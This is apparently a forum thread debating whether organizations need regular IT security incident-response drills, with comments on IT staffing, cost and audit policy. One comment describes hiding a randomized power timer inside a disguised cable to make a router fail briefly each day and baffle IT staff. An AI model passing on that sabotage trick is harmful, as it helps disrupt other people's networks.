Do We Need Regular IT Security Fire Drills?

An anonymous reader writes: This article argues that organizations need to move beyond focusing purely on the prevention of security incidents, and start to concentrate on what they will do when an incident occurs. IT security "fire drills," supported by executive management should be conducted regularly in organizations, in order to understand the appropriate course of action in advance of a security breach. This includes recovering evidence, identifying and resolving the root cause of the incident (not just the symptoms), and undertaking a forensic investigation.

That's a different skill-set

[phantomfive]

This includes recovering evidence, identifying and resolving the root cause of the incident (not just the symptoms), and undertaking a forensic investigation.

That is not a skill set most IT departments have.

Re:That's a different skill-set

[Livius]

That is not a skill set most IT departments have.

I think that's the point.

Re:That's a different skill-set

[silas_moeckel]

Having a plan can be we have a contract with these guys to do this sort of work along with all the info they need. Along with all the paperwork and checking required.

Re:That's a different skill-set

[Lumpy]

90% of all IT departments can be driven bat shit crazy by installing a simple light timer on a router or switch and hiding it in the rats nest of power and other cables. Set the timer to be "anti burgular" mode where it adds randomness and have it drop power to a piece of gear for only 10 minutes once a day, because in 10 minutes by the time they get to the network closet, it will be back on and running.

It will drive them nuts and it will take MONTHS for them to find it, bet you they replace the router/switch befoer they find the timer. Bonus points if you make a decoy cable so that the timer is in the center of the cable hidden in the power tray and both ends look factory standard IEC.

Re:That's a different skill-set

[bill_mcgonigle]

That is not a skill set most IT departments have.

Many IT departments don't even have enough skill overage to deal with one guy being sick, much less have excess expert capacity.

Back in the 90's I watched a big medical center show the door to the guy who maintained the disaster recovery plan. He was "a cost center and never produced anything that anybody used."

That's about the timeframe when professional IT ended in the general population. Or maybe it's just when the general population got an IT staff.

Answer....

[bobbied]

Yes.... a million times YES

The "Be Prepared" motto isn't just for Boy Scouts, and it is not just about having what you need at hand, it's also about KNOWING what to do and being mentally prepared to do it quickly when required.

Nope

[sexconker]

Just like real fire drills, they're pretty pointless and no one takes them seriously because there's no fire.
So you either have a fruitless exercise that costs money because of all the interruptions, or you have a semi-fruitful exercise that costs a lot of money because of the extended interruptions caused by trying to simulate a real event.

The latter will marginally improve the response to an actual incident. Neither will fly, because they cost money and aren't mandated by law.

Re:Pro- vs Re-

[epyT-R]

I've seen several departments that made reactive approaches a policy. Proactive employees were criticized and repeat offenders let go. I don't get it at all. It costs more money and makes more work and stress. Who wants to keep patching the same problem over and over?

Re:No.

[plover]

That reminds me of one of those classic lists of airline mechanic log entries:
"Evidence of oil leak on landing gear. Signed, Joe Pilot"
"Evidence removed. Signed, Bob Mechanic"

Re:Hopelesss

[fuzzyfuzzyfungus]

Arguably (on a systemic level, not on the level of how wonderful your current IT guy isn't) 'IT' being something that attracts actual talent qualifies as 'non drill respect'.

As long as "IT" means 're-image the desktops and reboot the mailserver when it needs it, monkey!', you aren't exactly going to get the IT people whose prowess impresses you. On the plus side, you'll save money. On the minus side, it's going to be a bloodbath if you get unlucky in terms of hostile attention.

So long as 'IT' is handled as a cost-center, necessary-evil, bunch of obstructionist ethernet janitors, that's how it'll be. On the plus side, modern technology is actually pretty easy to use, so if nothing atypically bad happens you can get away with some fairly dubious expertise at the wheel, and save accordingly; but if that's the philosophy at work you probably won't end up with an IT group capable of rising very far to the occasion should things go to hell(either because something that shouldn't have been complex went bad, or because lizard squad is on you).

What is unclear, at present, is how, culturally and financially, any but the most zealously paranoid and deep pocketed companies and state entities are going to have IT groups that are good for much more than the bare minimum. So long as you don't expect IT to be much better than a bunch of fuckups, there really isn't any reason to pay more or recruit more carefully(doing day-to-day IT is really more logistics and a little scripting than anything even remotely approaching CS or even code monkeying); but if that is how IT groups are recruited, no sane person will expect better of them; because why would they be capable of better?

(Please note, I freely acknowledge, as an institution's IT person, that I'd be up shit creek if something genuinely nontrivial came gunning for me. I'm a hell of a lot cheaper than a real expert, I have good rapport with the users, strong command of standard logistics and management tools, things go nice and smooth; but I'm hardly a guru, nor do I expect to be treated as one. However, that's why I'm skeptical about this 'drill' thing. If you want to know that We Are Fucked if things get serious, I can tell you that for free(though we do have backup tapes, and I am perfectly capable of restoring, were the hypothetical attack to stop); but if you aren't interested in doing anything that might actually make you less fucked; because that'd cost a whole lot more, upset users, or both, what's the drill for? Perhaps there are organizations that actually live in ignorance, believing that they have hardcore experts willing to do routine IT stuff at relatively low prices; but those are likely a delusional minority. Everyone else just knows that having a bulletproof IT team would be an eye-watering outlay(that would spend most of its time twiddling its thumbs and swappping the occasional toner cartridge until something actually happens), while having an adequate-for-daily-use IT team is markedly cheaper and you can always claim that you 'followed industry best practices' if something goes pear shaped.)

Re:Pro- vs Re-

Call the police, have the goon arrested then walk over and plug the server in. easy as lyin.

These are simply audits

[cwills]

What you described is nothing more then a full security / disaster recovery audit. If your data center (and management) is really serious about it the company will need to invest both time and money to protect itself.

• Create your security policies. This has to be directed from a management level that can put teeth into it, as well as people who understand what the real risks to the business are. Company lawyers and people with business continuity experience might be involved depending on the consequences of what a data breach or disaster might do to the business.
  • determine what risks your business has
  • determine what needs to be done to mitigate the identified risks
  • determine what needs to be logged in order to allow forensic analysis (assume that the compromised system(s) logs themselves may have been corrupted as part of the breach)
• Make sure that the policies do not break the business. Also realize that security policies may require some processes to change.
• Understand that implementing security polices can be expensive.
• Employee education is a necessary step. Make sure employees understand what is being asked of them, and make sure that they understand what the policies are.
• Ensure that you have a designated security focal point.
• You will probably need an exception process. Make sure that any exceptions are documented with management, what is being done to mitigate any risks the exception have exposed and how long the exception needs to be in place.

Once you have your policies in place and everyone has "signed off" that they are in compliance, you can start with the auditing.

• Have some level of auditing where it's a "friendly" review of the systems.
• Audits should not instill fear, however there may need to be real consequences for negligent audit failures (depending on the business and type of data).
• Depending on the business, you may want to have an independent auditing group come in and review your systems and policies
• During an audit, system or process owners should only be held accountable to what is in the security policies. If the audit finds issues that are outside the policies, then management and the policy owner needs to respond.

One additional comment, depending on the size of the organization, there may be a security group. If there is one, then it should be the responsibility of this group to perform any security monitoring or testing. Individuals outside the group should not be performing their own security or intrusion testing of systems that they are not directly responsible for. If a vulnerability is uncovered, it should be documented and reported to the security focal point and management.